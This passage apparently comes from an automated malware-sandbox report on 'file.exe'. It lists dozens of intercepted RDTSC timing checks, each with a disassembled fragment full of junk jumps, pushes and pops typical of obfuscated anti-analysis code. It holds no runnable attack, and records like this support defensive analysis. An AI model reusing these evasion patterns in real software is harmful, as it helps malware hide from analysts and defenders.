                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109E6 second address: 4A10A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA97h 0x0000000b adc ch, FFFFFFDEh 0x0000000e jmp 00007F7174CEBA99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 jmp 00007F7174CEBA8Eh 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 jmp 00007F7174CEBA90h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A4C second address: 4A10A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A50 second address: 4A10A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A54 second address: 4A10A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A5A second address: 4A10A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A6B second address: 4A10A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7174BA6FE2h 0x0000000a or ah, FFFFFF98h 0x0000000d jmp 00007F7174BA6FDBh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A92 second address: 4A10AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F7174CEBA90h 0x0000000c xor esi, 3C8C4EF8h 0x00000012 jmp 00007F7174CEBA8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7174CEBA95h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AD6 second address: 4A10ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B21 second address: 4A10B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B25 second address: 4A10B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B2B second address: 4A10B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B3C second address: 4A10C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7174BA6FE3h 0x00000014 add cx, C83Eh 0x00000019 jmp 00007F7174BA6FE9h 0x0000001e popfd 0x0000001f popad 0x00000020 js 00007F71E4F95B0Fh 0x00000026 jmp 00007F7174BA6FDEh 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e jmp 00007F7174BA6FE0h 0x00000033 mov dword ptr [esi+04h], eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F7174BA6FDEh 0x0000003d or ax, 3798h 0x00000042 jmp 00007F7174BA6FDBh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F7174BA6FE8h 0x0000004e sub ecx, 13E261F8h 0x00000054 jmp 00007F7174BA6FDBh 0x00000059 popfd 0x0000005a popad 0x0000005b lea eax, dword ptr [ebx+78h] 0x0000005e jmp 00007F7174BA6FE6h 0x00000063 push 00000001h 0x00000065 pushad 0x00000066 mov ax, B7EDh 0x0000006a jmp 00007F7174BA6FDAh 0x0000006f popad 0x00000070 nop 0x00000071 jmp 00007F7174BA6FE0h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F7174BA6FDDh 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C4F second address: 4A10C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C55 second address: 4A10CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 pushfd 0x00000007 jmp 00007F7174BA6FE6h 0x0000000c xor cl, 00000048h 0x0000000f jmp 00007F7174BA6FDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 jmp 00007F7174BA6FE6h 0x0000001e lea eax, dword ptr [ebp-08h] 0x00000021 jmp 00007F7174BA6FE0h 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, 41310833h 0x0000002e jmp 00007F7174BA6FE8h 0x00000033 popad 0x00000034 mov ax, E811h 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b mov esi, ebx 0x0000003d push ebx 0x0000003e mov eax, 52FB7A8Bh 0x00000043 pop eax 0x00000044 popad 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F7174BA6FE9h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CFE second address: 4A10D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D04 second address: 4A10D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D1D second address: 4A10D48 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bl, ch 0x00000009 popad 0x0000000a mov edi, eax 0x0000000c jmp 00007F7174CEBA97h 0x00000011 test edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D48 second address: 4A10D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D4C second address: 4A10D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D50 second address: 4A10D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D56 second address: 4A10D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D5C second address: 4A10D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F71E4F95919h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7174BA6FDAh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D8A second address: 4A10D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D99 second address: 4A10DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c jmp 00007F7174BA6FDEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7174BA6FE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DE3 second address: 4A10E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c pushad 0x0000000d mov cx, FB13h 0x00000011 mov cx, 356Fh 0x00000015 popad 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b movzx ecx, bx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E15 second address: 4A10E4B instructions: 0x00000000 rdtsc 0x00000002 call 00007F7174BA6FE3h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edx, ax 0x0000000d popad 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7174BA6FE7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E4B second address: 4A10EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA8Fh 0x00000009 jmp 00007F7174CEBA93h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx edx, si 0x00000019 pushfd 0x0000001a jmp 00007F7174CEBA8Eh 0x0000001f add eax, 510CECB8h 0x00000025 jmp 00007F7174CEBA8Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EA5 second address: 4A10EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EAB second address: 4A10F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA96h 0x0000000b sbb esi, 10548648h 0x00000011 jmp 00007F7174CEBA8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebp-18h] 0x0000001d jmp 00007F7174CEBA96h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7174CEBA97h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F0F second address: 4A10F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F27 second address: 4A10F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F2B second address: 4A10F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, CB4Eh 0x00000010 pushfd 0x00000011 jmp 00007F7174BA6FDFh 0x00000016 adc cl, FFFFFFFEh 0x00000019 jmp 00007F7174BA6FE9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F69 second address: 4A10F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1101F second address: 4A11023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11023 second address: 4A11027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11027 second address: 4A1102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1102D second address: 4A1106E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F7174CEBA90h 0x00000011 mov edx, 74E806ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7174CEBA97h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1106E second address: 4A11099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7174BA6FDAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11099 second address: 4A110DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 83h 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA8Ah 0x0000000b sbb cx, ADF8h 0x00000010 jmp 00007F7174CEBA8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d jmp 00007F7174CEBA96h 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110DE second address: 4A110E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110E2 second address: 4A110E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110E6 second address: 4A110EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110EC second address: 4A1112F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F7174CEBA93h 0x00000011 jne 00007F71E50DA057h 0x00000017 jmp 00007F7174CEBA96h 0x0000001c mov edx, dword ptr [ebp+08h] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1112F second address: 4A11133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11133 second address: 4A111FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7174CEBA8Ah 0x00000008 xor ah, 00000048h 0x0000000b jmp 00007F7174CEBA8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 77E257BFh 0x00000018 popad 0x00000019 mov eax, dword ptr [esi] 0x0000001b pushad 0x0000001c call 00007F7174CEBA90h 0x00000021 pushfd 0x00000022 jmp 00007F7174CEBA92h 0x00000027 sbb al, FFFFFFD8h 0x0000002a jmp 00007F7174CEBA8Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 mov esi, ebx 0x00000033 popad 0x00000034 mov dword ptr [edx], eax 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a mov edi, 41A24920h 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+04h] 0x00000043 jmp 00007F7174CEBA8Fh 0x00000048 mov dword ptr [edx+04h], eax 0x0000004b jmp 00007F7174CEBA96h 0x00000050 mov eax, dword ptr [esi+08h] 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F7174CEBA8Eh 0x0000005a xor ch, FFFFFFC8h 0x0000005d jmp 00007F7174CEBA8Bh 0x00000062 popfd 0x00000063 push ecx 0x00000064 mov edi, 1A49836Ah 0x00000069 pop edi 0x0000006a popad 0x0000006b mov dword ptr [edx+08h], eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 mov dh, CCh 0x00000073 movzx esi, di 0x00000076 popad 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A111FD second address: 4A11220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7174BA6FDAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11220 second address: 4A11224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11224 second address: 4A1122A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1122A second address: 4A1123B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1123B second address: 4A11278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e jmp 00007F7174BA6FDEh 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F7174BA6FDDh 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11278 second address: 4A112C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 04h 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e jmp 00007F7174CEBA8Eh 0x00000013 mov eax, dword ptr [esi+14h] 0x00000016 jmp 00007F7174CEBA90h 0x0000001b mov dword ptr [edx+14h], eax 0x0000001e jmp 00007F7174CEBA90h 0x00000023 mov eax, dword ptr [esi+18h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112C3 second address: 4A112C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112C7 second address: 4A112CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112CB second address: 4A112D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A112D1 second address: 4A1131D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA92h 0x00000009 and ax, D668h 0x0000000e jmp 00007F7174CEBA8Bh 0x00000013 popfd 0x00000014 jmp 00007F7174CEBA98h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+18h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dl, C8h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1131D second address: 4A11322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11322 second address: 4A1136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F7174CEBA97h 0x0000000c and ax, 3FBEh 0x00000011 jmp 00007F7174CEBA99h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+1Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1136A second address: 4A11371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11371 second address: 4A11400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov cx, bx 0x00000011 pop ebx 0x00000012 jmp 00007F7174CEBA96h 0x00000017 popad 0x00000018 mov eax, dword ptr [esi+20h] 0x0000001b jmp 00007F7174CEBA90h 0x00000020 mov dword ptr [edx+20h], eax 0x00000023 jmp 00007F7174CEBA90h 0x00000028 mov eax, dword ptr [esi+24h] 0x0000002b pushad 0x0000002c call 00007F7174CEBA8Eh 0x00000031 push ecx 0x00000032 pop edi 0x00000033 pop esi 0x00000034 mov dx, 95A2h 0x00000038 popad 0x00000039 mov dword ptr [edx+24h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7174CEBA94h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11400 second address: 4A11412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FDEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11412 second address: 4A11429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7174CEBA8Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11567 second address: 4A115F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f jmp 00007F7174BA6FDEh 0x00000014 jne 00007F71E4F9515Dh 0x0000001a pushad 0x0000001b call 00007F7174BA6FDEh 0x00000020 mov edi, esi 0x00000022 pop ecx 0x00000023 mov dl, 8Eh 0x00000025 popad 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007F7174BA6FDBh 0x00000032 pop esi 0x00000033 pushfd 0x00000034 jmp 00007F7174BA6FE9h 0x00000039 add eax, 3672F2A6h 0x0000003f jmp 00007F7174BA6FE1h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A115F1 second address: 4A11643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 jmp 00007F7174CEBA98h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or dword ptr [edx+3Ch], FFFFFFFFh 0x00000012 jmp 00007F7174CEBA90h 0x00000017 or dword ptr [edx+40h], FFFFFFFFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7174CEBA97h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11643 second address: 4A1167D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FE8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1167D second address: 4A11681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11681 second address: 4A11687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007E7 second address: 4A007EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007EB second address: 4A007F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F1 second address: 4A0080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA99h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0093C second address: 4A00996 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7174BA6FE6h 0x00000008 add esi, 7D7811A8h 0x0000000e jmp 00007F7174BA6FDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007F7174BA6FE8h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e movzx esi, dx 0x00000021 mov di, 0F9Eh 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop ecx 0x0000002c mov cx, dx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D1C second address: 49E0D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0D20 second address: 49E0D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
